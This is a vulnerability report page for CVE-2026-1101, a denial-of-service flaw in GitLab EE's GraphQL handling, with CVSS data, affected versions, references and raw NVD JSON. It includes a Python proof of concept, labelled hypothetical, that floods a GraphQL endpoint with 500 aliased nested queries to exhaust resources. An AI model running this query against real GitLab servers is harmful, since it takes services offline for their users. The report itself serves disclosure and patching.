Security Vulnerability Report
CVE-2026-1101 CVSS 6.5 MEDIUM

CVE-2026-1101

Published: 2026-04-08 23:16:58
Last Modified: 2026-04-14 14:05:39

Description

GitLab has remediated an issue in GitLab EE affecting all versions from 18.2 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user to cause denial of service to the GitLab instance due to improper input validation in GraphQL queries.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Weakness (CWE)
CWE-1284 (Improper Validation of Specified Quantity in Input)

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* (versions from 18.2 before 18.8.9) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* (versions from 18.9.0 before 18.9.5) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* (versions from 18.10.0 before 18.10.3) - VULNERABLE
GitLab EE versions from 18.2 up to, but not including, 18.8.9
GitLab EE versions from 18.9 up to, but not including, 18.9.5
GitLab EE versions from 18.10 up to, but not including, 18.10.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
import requests

# Conceptual PoC for CVE-2026-1101
# This script demonstrates how a malicious GraphQL query might be sent.
# Actual payload would depend on the specific vulnerable schema.

target_url = "https://gitlab.example.com/api/graphql"
token = "YOUR_AUTH_TOKEN"  # Low privilege user token

# Malicious query designed to cause resource exhaustion (e.g., deep nesting or alias explosion)
# Note: The specific query structure is hypothetical based on "improper input validation".
# Each aliased "issues" selection repeats the same field set; braces are doubled
# because the fragment is built with an f-string.
aliased_selections = "\n    ".join(
    [f"issue{i}: issues {{ nodes {{ title author {{ name }} }} }}" for i in range(500)]
)
malicious_query = """
query {
  project(fullPath: "root/test-project") {
    %s
  }
}
""" % aliased_selections

headers = {
    "Authorization": f"Bearer {token}",
    "Content-Type": "application/json",
}
payload = {
    "query": malicious_query,
    "variables": {},
}

try:
    response = requests.post(target_url, json=payload, headers=headers, timeout=10)
    print(f"Status Code: {response.status_code}")
    print("Response snippet:", response.text[:200])
except requests.exceptions.RequestException as e:
    print(f"Request failed (possible DoS): {e}")

References

https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/ (Release Notes, Vendor Advisory)
https://gitlab.com/gitlab-org/gitlab/-/work_items/586488 (Broken Link)
https://hackerone.com/reports/3460228 (Permissions Required)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-1101",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-08T23:16:57.667",
    "lastModified": "2026-04-14T14:05:39.397",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 18.2 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user to cause denial of service to the GitLab instance due to improper input validation in GraphQL queries."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-1284"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*",
                "versionStartIncluding": "18.2",
                "versionEndExcluding": "18.8.9",
                "matchCriteriaId": "DE6B64C1-04D6-4E07-A730-72DD62AB9443"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*",
                "versionStartIncluding": "18.9.0",
                "versionEndExcluding": "18.9.5",
                "matchCriteriaId": "3BA6A89D-D2C1-45B9-A8E8-64256816D880"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*",
                "versionStartIncluding": "18.10.0",
                "versionEndExcluding": "18.10.3",
                "matchCriteriaId": "BB2F3665-2451-4A4D-8538-93F540975F0E"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/",
        "source": "[email protected]",
        "tags": ["Release Notes", "Vendor Advisory"]
      },
      {
        "url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/586488",
        "source": "[email protected]",
        "tags": ["Broken Link"]
      },
      {
        "url": "https://hackerone.com/reports/3460228",
        "source": "[email protected]",
        "tags": ["Permissions Required"]
      }
    ]
  }
}